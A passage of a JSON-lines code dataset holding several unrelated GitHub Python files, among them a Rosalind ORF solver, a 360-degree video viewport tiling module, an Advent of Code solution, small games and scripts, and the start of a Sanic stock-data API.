text_reverse_result = text_reverse_result + \"G\"\n if i == \"G\":\n text_reverse_result = text_reverse_result + \"C\"\n\noutput_array = []\ndata.append(text_reverse_result)\nfor k in data:\n for i in range(len(k)):\n tally = 2\n store = \"\"\n if k[i:i+3] == \"ATG\":\n #print(range(i,len(k)))\n for j in range(i,len(k)):\n 
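# hedged aside, not from the original script: an equivalent, compact way to pull one ORF\n                # from a start index s of a plain string seq (illustrative names, not variables defined here):\n                #   stops = {\"TAA\", \"TAG\", \"TGA\"}\n                #   orf = next((seq[s:e + 3] for e in range(s, len(seq) - 2, 3) if seq[e:e + 3] in stops), None)\n                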
#print(i,j)\n tally += 1\n store = store + k[j]\n if tally == 3:\n tally = 0\n if (k[j:j+3] == \"TGA\") or (k[j:j+3] == \"TAG\") or (k[j:j+3] == \"TAA\"): \n #print(store, \" \",k)\n output_array.append(store)\n break\n\nprotein_array = []\nfor j in output_array:\n array = []\n tally = 0\n store = \"\"\n for i in j:\n tally += 1\n store = store + i\n if tally == 3:\n tally = 0\n array.append(store)\n store = \"\"\n store = \"\"\n for i in array:\n if codon_dic[i] != \"Stop\":\n store = store + codon_dic[i]\n protein_array.append(store) \n\n#print(protein_array)\n\nprotein_array_unique = []\nfor i in protein_array:\n if i not in protein_array_unique:\n protein_array_unique.append(i)\noutput = \"\"\nfor i in protein_array_unique:\n output += i + \"\\n\"\nprint(output)\n","repo_name":"Dauthlin/Rosalind-Questions","sub_path":"Open Reading Frames with reverse.py","file_name":"Open Reading Frames with reverse.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16594134626","text":"# uses amazon comprehend to evaluate the sentiment of a given input\nimport boto3\n\ntext = input(\"Insert a phrase whose sentiment will be evaluated: \")\n\nclient = boto3.client('comprehend')\nreq_resp = client.detect_sentiment(LanguageCode=\"en\",\n Text=text)\n\nprint(\"The detected sentiment was: \" + req_resp['Sentiment'])\n\n\nfor sentiment, confidence_value in req_resp['SentimentScore'].items():\n print(sentiment + \": \" + str(confidence_value))\n","repo_name":"jpcorreia99/aws-ML","sub_path":"comprehend/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8439864910","text":"import argparse\nfrom abc import ABC, abstractmethod\nfrom math import pi\n\nimport numpy as np\n\nnp.set_printoptions(precision=3)\n\nfrom matplotlib import pyplot as plt\n\nfrom util import splitx, rot_matrix, get_borders\n\n\nclass Viewport:\n base_normals: np.ndarray\n fov: tuple\n px_in_vp: np.ndarray\n yaw_pitch_roll: np.ndarray = np.array([0, 0, 0])\n _mat_rot: np.ndarray\n _rotated_normals: np.ndarray\n _is_in_vp: bool\n\n def __init__(self, yaw_pitch_roll: tuple, fov: tuple):\n \"\"\"\n Viewport Class used to extract view pixels in projections.\n The vp is an image as numpy array with shape (H, M, 3).\n That can be RGB (matplotlib, pillow, etc) or BGR (opencv).\n\n :param frame yaw_pitch_roll: (600, 800) for 800x600px\n :param fov: (fov_v, fov_h) in rad. Ex: \"np.array((pi/2, pi/2))\" for (90°x90°)\n \"\"\"\n self.fov = fov\n self.make_base_normals()\n self.yaw_pitch_roll = np.asarray(yaw_pitch_roll)\n\n def is_viewport(self, x_y_z: np.ndarray) -> bool:\n \"\"\"\n Check if the plane equation is true to viewport\n x1 * m + y1 * n + z1 * z < 0\n If True, the \"point\" is on the viewport\n Obs: is_in só retorna true se todas as expressões forem verdadeiras\n\n :param x_y_z: A 3D Point list in the space [(x, y, z), ...].T, shape == (3, ...)\n :return: A boolean belong = np.all(inner_product <= 0, axis=0).reshape(self.shape)\n\n \"\"\"\n inner_prod = self.rotated_normals.T @ x_y_z\n self.px_in_vp = np.all(inner_prod <= 0, axis=0)\n self._is_in_vp = np.any(self.px_in_vp)\n return self._is_in_vp\n\n def make_base_normals(self) -> None:\n \"\"\"\n Com eixo entrando no observador, rotação horário é negativo e anti-horária\n é positivo. 
Todos os ângulos são radianos.\n\n O exito x aponta para a direita\n O eixo y aponta para baixo\n O eixo z aponta para a frente\n\n Deslocamento para a direita e para cima e horário é positivo.\n\n O viewport é a região da esfera que faz intersecção com 4 planos que passam pelo\n centro (4 grandes círculos): cima, direita, baixo e esquerda.\n Os planos são definidos tal que suas normais (N) parte do centro e apontam na mesma direção a\n região do viewport. Ex: O plano de cima aponta para cima, etc.\n Todos os píxeis que estiverem abaixo do plano {N(x,y,z) dot P(x,y,z) <= 0}\n O plano de cima possui incinação de FOV_Y / 2.\n Sua normal é x=0,y=sin(FOV_Y/2 + pi/2), z=cos(FOV_Y/2 + pi/2)\n O plano de baixo possui incinação de -FOV_Y / 2.\n Sua normal é x=0,y=sin(-FOV_Y/2 - pi/2), z=cos(-FOV_Y/2 - pi/2)\n O plano da direita possui incinação de FOV_X / 2. (para direita)\n Sua normal é x=sin(FOV_X/2 + pi/2),y=0, z=cos(FOV_X/2 + pi/2)\n O plano da esquerda possui incinação de -FOV_X/2. (para direita)\n Sua normal é x=sin(-FOV_X/2 - pi/2),y=0, z=cos(-FOV_X/2 - pi/2)\n\n :return:\n \"\"\"\n fov_y_2, fov_x_2 = np.array(self.fov) / (2, 2)\n pi_2 = np.pi / 2\n\n self.base_normals = np.array([[0, -np.sin(fov_y_2 + pi_2), np.cos(fov_y_2 + pi_2)], # top\n [0, -np.sin(-fov_y_2 - pi_2), np.cos(-fov_y_2 - pi_2)], # bottom\n [np.sin(fov_x_2 + pi_2), 0, np.cos(fov_x_2 + pi_2)], # left\n [np.sin(-fov_x_2 - pi_2), 0, np.cos(-fov_x_2 - pi_2)]]).T # right\n\n @property\n def rotated_normals(self) -> np.ndarray:\n self._rotated_normals = rot_matrix(self.yaw_pitch_roll) @ self.base_normals\n return self._rotated_normals\n\n\nclass Projection(ABC):\n viewport: Viewport\n yaw_pitch_roll: np.ndarray\n projection: np.ndarray # A RGB image\n vptiles: dict\n\n def __init__(self, tiling: str, proj_res: str, fov: str):\n # Create the viewport\n self.fov = np.deg2rad(splitx(fov)[::-1])\n\n # Create the projection\n self.shape = np.array(splitx(proj_res)[::-1], dtype=int)\n self.proj_coord_nm = np.mgrid[range(self.shape[0]), range(self.shape[1])]\n\n # Create the tiling\n self.tiling = np.array(splitx(tiling)[::-1], dtype=int)\n self.n_tiles = self.tiling[0] * self.tiling[1]\n self.tile_shape = (self.shape / self.tiling).astype(int)\n self.tile_position_list = np.array([(n, m)\n for n in range(0, self.shape[0], self.tile_shape[0])\n for m in range(0, self.shape[1], self.tile_shape[1])])\n\n # Get tiles borders\n self.tile_border_base = get_borders(shape=self.tile_shape)\n\n @property\n @abstractmethod\n def nfaces(self):\n pass\n\n def get_tile_borders_nm(self, idx: int):\n # projection agnostic\n return self.tile_border_base + self.tile_position_list[idx].reshape(2, -1)\n\n def get_tile_array(self, tile, array):\n n, m = self.tile_position_list[tile]\n h, w = self.tile_shape\n if array.shape[0] >= 3:\n return array[..., n:n + h, m:m + w]\n else:\n return array[n:n + h, m:m + w]\n\n @staticmethod\n @abstractmethod\n def nm2xyz(nm_coord: np.ndarray, shape: np.ndarray, face: int):\n pass\n\n @staticmethod\n @abstractmethod\n def xyz2nm(nm_coord: np.ndarray, shape: np.ndarray):\n pass\n\n @abstractmethod\n def get_vptiles(self, yaw_pitch_roll) -> list[int]:\n pass\n\n @abstractmethod\n def get_projection(self):\n pass\n\n\nclass ERP(Projection):\n @property\n def nfaces(self):\n return 1\n\n def __init__(self, tiling: str, proj_res: str, fov: str):\n super().__init__(tiling, proj_res, fov)\n self.proj_coord_xyz = self.nm2xyz(self.proj_coord_nm, self.shape)\n\n self.tiles_borders_xyz = []\n for tile in range(self.n_tiles):\n 
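# hedged aside, not in the original file: nm2xyz (defined below) maps a pixel centre to a unit\n            # vector via az = ((m + 0.5)/M - 0.5)*2*pi and el = -((n + 0.5)/N - 0.5)*pi, then\n            # x = cos(el)*sin(az), y = -sin(el), z = cos(el)*cos(az).\n            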
borders_nm = self.get_tile_borders_nm(tile)\n self.tiles_borders_xyz.append(self.nm2xyz(nm_coord=borders_nm, shape=self.shape))\n\n def get_vptiles(self, yaw_pitch_roll) -> dict[int, str]:\n \"\"\"\n\n :param yaw_pitch_roll: The coordinate of center of VP.\n :return:\n \"\"\"\n if tuple(self.tiling) == (1, 1):\n return {0: '100.00%'}\n\n self.viewport = Viewport(yaw_pitch_roll, self.fov)\n self.vptiles = {}\n n_pix = self.tile_shape[0] * self.tile_shape[1]\n\n for tile in range(self.n_tiles):\n tile_coord_xyz = self.get_tile_array(tile, self.proj_coord_xyz)\n if self.viewport.is_viewport(tile_coord_xyz.reshape([3, -1])):\n count_pix = np.sum(self.viewport.px_in_vp)\n self.vptiles[tile] = f'{100 * count_pix / n_pix:.2f}%'\n # plt.imshow(self.viewport.px_in_vp.reshape(self.tile_shape));plt.show()\n\n return self.vptiles\n\n def get_projection(self):\n self.projection = np.zeros(self.shape, dtype='uint8')\n\n for tile in range(self.n_tiles):\n n, m = self.get_tile_borders_nm(tile)\n if tile in self.vptiles:\n self.projection[n, m] = 255\n else:\n self.projection[n, m] = 100\n\n self.viewport.is_viewport(self.proj_coord_xyz.reshape((3, -1)))\n belong = self.viewport.px_in_vp.reshape(self.proj_coord_xyz.shape[1:])\n self.projection[belong] = 200\n\n return self.projection\n\n @staticmethod\n def nm2xyz(nm_coord: np.ndarray, shape: np.ndarray, face: int = 0):\n \"\"\"\n ERP specific.\n\n :param face: 0 for ERP\n :param nm_coord: shape==(2,...)\n :param shape: (N, M)\n :return:\n \"\"\"\n azimuth = ((nm_coord[1] + 0.5) / shape[1] - 0.5) * 2 * np.pi\n elevation = ((nm_coord[0] + 0.5) / shape[0] - 0.5) * -np.pi\n\n z = np.cos(elevation) * np.cos(azimuth)\n y = -np.sin(elevation)\n x = np.cos(elevation) * np.sin(azimuth)\n\n xyz_coord = np.array([x, y, z])\n return xyz_coord\n\n @staticmethod\n def xyz2nm(xyz_coord: np.ndarray, shape: np.ndarray = None, round_nm: bool = False):\n \"\"\"\n ERP specific.\n\n :param xyz_coord: [[[x, y, z], ..., M], ..., N] (shape == (N,M,3))\n :param shape: the shape of projection that cover all sphere\n :param round_nm: round the coords? 
is not needed.\n :return:\n \"\"\"\n if shape is None:\n shape = xyz_coord.shape[:2]\n\n N, M = shape[:2]\n\n r = np.sqrt(np.sum(xyz_coord ** 2, axis=0))\n\n elevation = np.arcsin(xyz_coord[1] / r)\n azimuth = np.arctan2(xyz_coord[0], xyz_coord[2])\n\n v = elevation / pi + 0.5\n u = azimuth / (2 * pi) + 0.5\n\n n = v * N - 0.5\n m = u * M - 0.5\n\n if round_nm:\n n = np.mod(np.round(n), N)\n m = np.mod(np.round(m), M)\n\n return np.array([n, m])\n\n\nclass CMP(Projection):\n def __init__(self, tiling: str, proj_res: str, fov: str):\n super().__init__(tiling, proj_res, fov)\n\n # Create faces structures\n face_h, face_w = face_shape = (self.shape / (2, 3)).astype(int)\n face_array_mn = np.mgrid[range(face_h), range(face_w)]\n\n self.face_position_list = np.array([(n, m)\n for n in range(0, self.shape[0], face_h)\n for m in range(0, self.shape[1], face_w)])\n\n self.proj_coord_xyz = self.nm2xyz(self.proj_coord_nm)\n\n self.tiles_borders_xyz = []\n for tile in range(self.n_tiles):\n borders_nm = self.get_tile_borders_nm(tile)\n borders_xyz = self.proj_coord_xyz[:, borders_nm[0, :], borders_nm[1, :]] # testar\n self.tiles_borders_xyz.append(borders_xyz)\n\n @property\n def nfaces(self):\n return 6\n\n @staticmethod\n def nm2xyz(nm_coord: np.ndarray, proj_shape: np.ndarray = None, face: int = None):\n # nm_coord is only for face\n u = v = np.array([])\n z, y, x = 0, 0, 0\n\n def face2vu():\n nonlocal u, v\n face_nm_array = np.mgrid[range(face_h), range(face_w)]\n u = 2 * (face_nm_array[1] + 0.5) / face_w - 1 # (-1, 1)\n v = -2 * (face_nm_array[0] + 0.5 - face_h) / face_h - 1 # (-1, 1)\n\n def vu2xyz():\n nonlocal z, y, x\n nonlocal u, v\n if face == 0:\n # left no rotate\n x = -np.ones(u.shape)\n y = -v\n z = u\n elif face == 1:\n # center no rotate\n x = u\n y = -v\n z = np.ones(u.shape)\n elif face == 2:\n # right no rotate\n x = np.ones(u.shape)\n y = -v\n z = -u\n elif face == 3:\n # down rotate 90° anti-clockwise\n w = np.zeros(u.shape)\n a = np.array([u, v, w])\n u1, v1, w3 = (a.transpose([1, 2, 0]) @ rot_matrix([0, 0, pi / 2])).transpose([2, 0, 1])\n\n x = u1\n y = np.ones(u.shape)\n z = v1\n elif face == 4:\n # back rotate 90° clockwise\n w = np.zeros(u.shape)\n a = np.array([u, v, w])\n u1, v1, w3 = (a.transpose([1, 2, 0]) @ rot_matrix([0, 0, -pi / 2])).transpose([2, 0, 1])\n\n x = -u1\n y = -v1\n z = -np.ones(u.shape)\n elif face == 5:\n # up rotate 90° anti-clockwise\n w = np.zeros(u.shape)\n a = np.array([u, v, w])\n u1, v1, w3 = (a.transpose([1, 2, 0]) @ rot_matrix([0, 0, pi / 2])).transpose([2, 0, 1])\n\n x = u1\n y = -np.ones(u.shape)\n z = -v1\n\n if face is None:\n if proj_shape is None:\n proj_shape = np.array(nm_coord.shape[-2:])\n\n face_h, face_w = (proj_shape / (2, 3)).astype(int)\n face2vu()\n\n face_position_list = np.array([(n, m)\n for n in range(0, proj_shape[0], face_h)\n for m in range(0, proj_shape[1], face_w)])\n proj_coord_xyz = np.zeros((3, proj_shape[0], proj_shape[1]))\n for face in range(6):\n vu2xyz()\n n, m = face_position_list[face]\n proj_coord_xyz[:, n:n + face_h, m:m + face_w] = np.array([x, y, z])\n\n return proj_coord_xyz\n\n else:\n assert isinstance(face, int)\n assert isinstance(proj_shape, np.ndarray)\n face_h, face_w = proj_shape / (2, 3)\n face2vu()\n vu2xyz()\n return np.array([x, y, z])\n\n @staticmethod\n def xyz2nm(xyz_coord: np.ndarray, shape: np.ndarray = None, round_nm: bool = False, face: int = 0):\n x, y, z = xyz_coord\n f = 0\n r = np.sqrt(x ** 2 + y ** 2 + z ** 2)\n azimuth = np.arctan2(x, z)\n elevation = np.arcsin(-y / r)\n u = 
azimuth / (2 * np.pi) + 0.5\n v = -elevation / np.pi + 0.5\n f, m, n = 0, 0, 0\n return f, m, n\n\n get_vptiles = ERP.get_vptiles\n get_projection = ERP.get_projection\n\n\ndef test():\n # erp '144x72', [array([0, 0]), array([144, 72]), array([288, 144]), array([432, 216]), array([576, 288]), array([720, 360]), array([864, 432]), array([1008, 504]), array([1152, 576]), array([1296, 648])]\n # cmp '108x72', [array([0, 0]), array([108, 72]), array([216, 144]), array([324, 216]), array([432, 288]), array([540, 360]), array([648, 432]), array([756, 504]), array([864, 576]), array([972, 648])]\n\n # proj = ERP('6x4', f'1152x768', '100x100')\n proj = CMP('6x4', f'972x648', '100x90')\n\n # for i in [30]:\n for frame, i in enumerate(range(0, -360, -10)):\n tiles = proj.get_vptiles(np.deg2rad((0, 0, i)))\n projection = proj.get_projection()\n plt.imsave(f'teste/teste_{frame}.png', projection)\n\n print(f'The viewport touch the tiles {tiles}.')\n\n\ndef main():\n if proj == 'erp':\n projection = ERP(tiling, f'1296x648', fov)\n elif proj == 'cmp':\n projection = CMP(tiling, f'972x648', fov)\n else:\n raise ValueError('The -proj must be \"erp\" or \"cmp\"')\n\n tiles = projection.get_vptiles(np.deg2rad(yaw_pitch_roll))\n\n if out is not None:\n projection = projection.get_projection()\n plt.imsave(f'{out}', projection)\n\n import json\n print(json.dumps(tiles, indent=2))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description='Get the tiles seen in viewport.')\n parser.add_argument('-proj', default='erp', metavar='PROJECTION', help='The projection [erp|cmp]')\n parser.add_argument('-fov', default='100x90', metavar='FOV', help=f'The Field of View in degree. Ex: 100x90')\n parser.add_argument('-tiling', default='3x2', metavar='TILING', help=f'The tiling of projection. 
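Given as WIDTHxHEIGHT, like the projection resolution. 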
Ex: 3x2.')\n parser.add_argument('-coord', default=['0', '0', '0'], nargs=3, metavar=('YAW', 'PITCH', 'ROLL'), help=f'The center of viewport in degree ex: 15,25,-30')\n parser.add_argument('-out', default=None, metavar='OUTPUT_FILE', help=f'Save the projection marks to OUTPUT_FILE file.')\n\n args = parser.parse_args()\n proj = args.proj\n fov = args.fov\n tiling = args.tiling\n yaw_pitch_roll: list = list(map(float, args.coord))\n out = args.out\n\n main()\n","repo_name":"henriquedgarcia/get_tiles","sub_path":"get_tiles.py","file_name":"get_tiles.py","file_ext":"py","file_size_in_byte":15572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27611419506","text":"from __future__ import division\n\nimport unittest\nimport numpy as np\n\nimport tttrlib\nfrom misc.compute_irf import model_irf\n\n\nirf, time_axis = model_irf(\n n_channels=64,\n period=32.,\n irf_position_p=2.0,\n irf_position_s=18.0,\n irf_width=0.25\n)\nbg = np.zeros_like(irf) + 0.2\n\n\nclass Tests(unittest.TestCase):\n\n def test_fit25(self):\n n_channels = 32\n irf_position_p = 2.0\n irf_position_s = 18.0\n irf_width = 0.25\n irf, time_axis = model_irf(\n n_channels=n_channels,\n period=32.,\n irf_position_p=irf_position_p,\n irf_position_s=irf_position_s,\n irf_width=irf_width\n )\n dt = time_axis[1] - time_axis[0]\n data = np.array(\n [0, 0, 0, 1, 9, 7, 5, 5, 5, 2, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 2, 2, 2, 2, 3, 0, 1, 0,\n 1, 1, 1, 2, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n )\n bg = np.zeros_like(irf)\n settings = {\n 'dt': dt,\n 'g_factor': 1.0,\n 'l1': 0.1,\n 'l2': 0.1,\n 'period': 32.0,\n 'convolution_stop': 31,\n 'irf': irf,\n 'background': bg,\n 'verbose': False\n }\n fit25 = tttrlib.Fit25(**settings)\n tau1, tau2, tau3, tau4 = 0.5, 1.0, 2.0, 4.0\n gamma, r0 = 0.02, 0.38\n x = np.array([tau1, tau2, tau3, tau4, gamma, r0])\n fixed = np.array([0, 0, 0, 0, 1, 1])\n r = fit25(\n data=data,\n initial_values=x,\n fixed=fixed\n )\n best_tau = r['x'][0]\n self.assertEqual(best_tau, 2.0)\n","repo_name":"Fluorescence-Tools/tttrlib","sub_path":"test/test_DecayFit25.py","file_name":"test_DecayFit25.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"9144378602","text":"from Utility import InputLoader\n\nimport statistics\nimport math\n\nwith InputLoader(day=7) as reader:\n crabs = [int(x) for line in reader for x in line.split(\",\")]\n\n\ndef complicated_but_robust():\n \"\"\"\n Makes a guess for the starting position, and starts looking around for the local minimum in terms of fuel consumed.\n Whatever position results in the minimum fuel consumption should be flanked by 2 positions that have\n greater or equal fuel consumption.\n\n Otherwise, follow the \"slope\" downwards towards this minimum. 
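Because each crab's cost of moving a distance d is the triangular number d*(d+1)/2,\n    the total cost is a sum of convex functions and has a single basin, so this local\n    search cannot settle on a false minimum.\n    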
This means that if for position X you have\n a fuel consumption greater than that for position X + 1, that means position X - 1 will be even greater and\n is not worth checking; instead look in the direction of position X + 2 until you find where it\n starts sloping back up again, and find that inflection point (which will be the minimum).\n\n Maybe could be made smarter by detecting the magnitude of the slope and adjusting the amount the \"cursor\" moves\n by, but doesn't appear to be necessary\n \"\"\"\n\n center = statistics.mean(crabs)\n position = math.floor(center)\n direction = 1\n value_map = dict()\n\n while True:\n if position not in value_map:\n value_map[position] = sum(fuel_consumption(abs(c - position)) for c in crabs)\n\n if position - 1 in value_map and position + 1 in value_map:\n if value_map[position] < min(value_map[position - 1], value_map[position + 1]):\n break\n elif value_map[position] > value_map[position + 1]:\n position += 1\n direction = 1\n else:\n position -= 1\n direction = -1\n elif position - direction in value_map:\n if value_map[position] <= value_map[position - direction]:\n position += direction\n else:\n position -= direction\n direction *= -1\n elif position + direction in value_map:\n if value_map[position] <= value_map[position + direction]:\n position -= direction\n direction *= -1\n else:\n position += direction\n else:\n position += direction\n\n print(f\"POSITION = {position}\")\n fuel = sum(fuel_consumption(abs(c - position)) for c in crabs)\n print(f\"FUEL CONSUMED = {fuel}\")\n\n\n#\n\n\ndef simple_but_unproven():\n \"\"\"\n The mean of the values seems to end up being the center position. However, I can't explain WHY that would be,\n so this solution might break under circumstances other than what I have available to me (because it works for\n those that I do).\n \"\"\"\n center = statistics.mean(crabs)\n fuel = min(sum(fuel_consumption(abs(c - math.floor(center))) for c in crabs),\n sum(fuel_consumption(abs(c - math.ceil(center))) for c in crabs))\n print(f\"CENTER = {center}\")\n print(f\"FUEL CONSUMED = {fuel}\")\n\n\n#\n\n\ndef fuel_consumption(dist: int) -> int:\n return int(((dist + 1) * dist) / 2)\n\n\ndef distance(fuel: int) -> int:\n return int(0.5 * ((((8 * fuel) + 1) ** 0.5) - 1))\n\n\n#\n\n\nif __name__ == '__main__':\n complicated_but_robust()\n","repo_name":"cgdilley/AdventOfCode2021","sub_path":"src/Day07/Day07.1.py","file_name":"Day07.1.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"24065663261","text":"#1/usr/bin/env python\nimport re\n\n\ninfile=\"NA_counts_at_positions.txt\"\n\nkeeps={}\nwith open(infile, 'r') as IN:\n\tfor line in IN:\n\t\tline=line.rstrip('\\n')\n\t\titems=re.split('\\t',line)\n\t\tposition,count,frac=items\n\t\tif float(frac) <.10:\n\t\t\tkeeps[position]=frac\n\nOUT=open(\"kin_matrix_ins_reduced.txt\", 'w')\norg=\"kin_matrix_ins.txt\"\n\nwith open(org, 'r') as IN:\n\theader=next(IN)\n\tOUT.write(header)\n\tfor line in IN:\n\t\tline=line.rstrip('\\n')\n\t\titems=re.split('\\t',line)\n\t\tpos=items[0]\n\t\tif pos in keeps.keys():\n\t\t\tOUT.write(line +'\\n')\n\nOUT.close()\n","repo_name":"AndersenLab/Transposons2","sub_path":"scripts/reduce_insertion_positions.py","file_name":"reduce_insertion_positions.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12510192682","text":"import cv2\nimport 
numpy as np\n\nimg = cv2.imread(\"user/aoi.png\")\nimg1 = cv2.imread(\"user/aoi.png\")\nimg2 = cv2.imread(\"user/trim.png\")\nkernel = np.ones((5, 5))\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\n\n\nprint(\"=== HoughLines & HoughLinesP ===\")\n#img = cv2.imread(\"tmk.png\", 0)\ncanny = cv2.Canny(img, 50, 100)\nlines = cv2.HoughLines(canny, 1, np.pi / 180, 100)\nprint(type(lines))\n# pass 10 as minLineLength by keyword: the fifth positional parameter of HoughLinesP is an optional output array\nlines = cv2.HoughLinesP(canny, 1, np.pi / 180, 100, minLineLength=10)\nprint(type(lines))\n","repo_name":"hoge1e3/jslesson","sub_path":"data/fs/home/0123/cho/pylib_sample6/cv2_sample_oecu.py","file_name":"cv2_sample_oecu.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"72909006808","text":"import random\n\nprint(\"Hi there!\\n======Welcome to Rock-Paper-Scissors Python Game======!\")\n\nwhile True:\n    # Getting user input\n    user = input(\n        \"Pick an option ('R' for rock, 'P' for paper, 'S' for scissors)\\nPlayer: \",\n    )\n    # List of possible options\n    options = [\"R\", \"P\", \"S\"]\n\n    computer = random.choice(options)\n\n    # Computer option\n    print(\"CPU:\", computer)\n\n    # Logic conditions (Win, lose or Draw/Tie)\n    if user == computer:\n        print(\"Both Player and CPU have selected the same option\\nIt's a tie!\")\n\n    elif user == \"R\":\n        if computer == \"P\":\n            print(\"Player (Rock) : CPU (Paper)\\nComputer wins!\")\n        else:\n            print(\"Player (Rock) : CPU (Scissors)\\nPlayer wins!\")\n\n    elif user == \"S\":\n        if computer == \"R\":\n            print(\"Player (Scissors) : CPU (Rock)\\nComputer wins!\")\n        else:\n            print(\"Player (Scissors) : CPU (Paper)\\nPlayer wins!\")\n\n    elif user == \"P\":\n        if computer == \"S\":\n            print(\"Player (Paper) : CPU (Scissors)\\nComputer wins!\")\n        else:\n            print(\"Player (Paper) : CPU (Rock)\\nPlayer wins!\")\n\n    # Error message\n    else:\n        print(\"Error! Invalid input, enter the correct option ...\")\n\n    # Ask if the user wants to play again\n    play_again = input(\"Do you want to play again [yes, no]? : \")\n    if play_again == \"yes\":\n        continue\n    elif play_again == \"no\":\n        break\n    else:\n        print(\"Oops! Wrong command!\")\nprint(\"=====GAME ENDS!====\\nI hope you had a nice time. 
Good bye!\")\n","repo_name":"Chidozie-c/rock-paper-scissors-task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8179214676","text":"import os\n\nfrom dask.distributed import Client\nimport distributed\n\nfrom Tools.condor_utils import make_htcondor_cluster\n\nfrom dask.distributed import Client, progress\n\ndef getWorkers( client ):\n logs = client.get_worker_logs()\n return list(logs.keys())\n\ndef getAllWarnings( client ):\n logs = client.get_worker_logs()\n workers = getWorkers( client )\n for worker in workers:\n for log in logs[worker]:\n if log[0] == 'WARNING' or log[0] == 'ERROR':\n print ()\n print (\" ### Found warning for worker:\", worker)\n print (log[1])\n\ndef getFilesNotFound( client ):\n allFiles = []\n logs = client.get_worker_logs()\n workers = getWorkers( client )\n for worker in workers:\n for log in logs[worker]:\n if log[0] == 'WARNING':\n print (worker)\n files = [ x for x in log[1].split() if x.count('xrootd') ]\n print ( files )\n allFiles += files\n\n return allFiles\n\ncluster = make_htcondor_cluster(local=False, dashboard_address=13349, disk = \"10GB\", memory = \"5GB\",)\n\nprint (\"Scaling cluster at address %s now.\"%cluster.scheduler_address)\n\ncluster.scale(25)\n\nwith open('scheduler_address.txt', 'w') as f:\n f.write(str(cluster.scheduler_address))\n\nc = Client(cluster)\n","repo_name":"cjmcmahon1/tW_scattering","sub_path":"start_cluster.py","file_name":"start_cluster.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"14519033660","text":"import random\r\n\r\ngifts = ['skarpeta', 'telefon', 'rękawiczki', 'słuchawki', 'komputer', 'sweter']\r\nmarket = ['telefon', 'słuchawki', 'komputer']\r\nwear_shop = ['skarpeta', 'rękawiczki', 'sweter']\r\n\r\ngift = random.choice(gifts)\r\n\r\nprint(f'Losowym przezentem na dzisiaj jest: {gift}')\r\n\r\nif market.count(gift) > 0:\r\n print(f'{gift} możesz kupić w sklepie z elektroniką.')\r\nelif wear_shop.count(gift) > 0:\r\n print(f'{gift} możesz kupić w sklepie z odzieżą.')\r\nelse:\r\n print('Nie mam dla ciebie rady gdzie szukać tego prezentu..')\r\n","repo_name":"Frycu128/CODE_ME","sub_path":"BASIC/06.5_Christmas_Tree/gift_for_family.py","file_name":"gift_for_family.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15721754009","text":"from itertools import islice\nfrom sanic import Sanic\nfrom sanic.response import json\nfrom sanic_cors import CORS, cross_origin\nimport requests\nimport asyncio\nimport asyncpg\nimport aiohttp\nfrom modules.models.supportedTimeIntervals import supportedTimeIntervals\nfrom modules.models.stockQuoteData import StockQuoteData\nfrom modules.models.companyStock import CompanyStock\nfrom modules.business import stockQuoteDataBusiness\nfrom modules.utils import config\nfrom modules.persistance import companyPersistence\nfrom marshmallow import Schema, fields, ValidationError, EXCLUDE\nfrom modules.models.companyStockSchema import CompanyStockSchema\nfrom modules.models.companyStockAlphaSchema import CompanyStockAlphaSchema\n\napp = Sanic(__name__)\nCORS(app)\n\n# método para retornar a série da dados do ibovespa no dia atual (intraday)\n# @params: timeInterval : valor de tempo para o intervalo de dados utilizado pela api do alpha vantage\n# 
@output: stockDataList : um JSON contendo a lista de ações diárias do ibovespa\n@app.route(\"/bvsp-intraday/\", methods=[\"GET\"])\nasync def getBvspIntraDay(request, timeInterval : int):\n try:\n validateTimeIntervalValue(timeInterval)\n except Exception as exceptionMessage:\n return json(\n {\"message\" : str(exceptionMessage)},\n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 406\n )\n\n parameters : str = \"\"\n function : str = \"TIME_SERIES_INTRADAY\" #parâmetro para intraday do alpha vantage\n symbol : str = \"^BVSP\" #símbolo para o Bovespa no alpha vantage\n interval : str = supportedTimeIntervals[timeInterval] #obtém a string reconhecida pela api do alpha vantage\n outputsize : str = \"full\" #série completa\n apiKey : str = config.getApiKey()\n \n #montando url para chamar a api do alpha vantage\n parameters = \"function=\" + function\n parameters += \"&symbol=\" + symbol\n parameters += \"&interval=\" + interval\n parameters += \"&outputsize=\" + outputsize\n parameters += \"&apikey=\" + apiKey\n\n response = requests.get('https://www.alphavantage.co/query?' + parameters)\n jsonResponse : dict = response.json() #em python, ao desserializar o json do response o objeto é do tipo dict\n try:\n metadata, timeStampsData = islice(jsonResponse.values(), 2)#os dados da série estão a partir do segunda valor que corresponde à chave Time Stamps \n stockDataList : list = 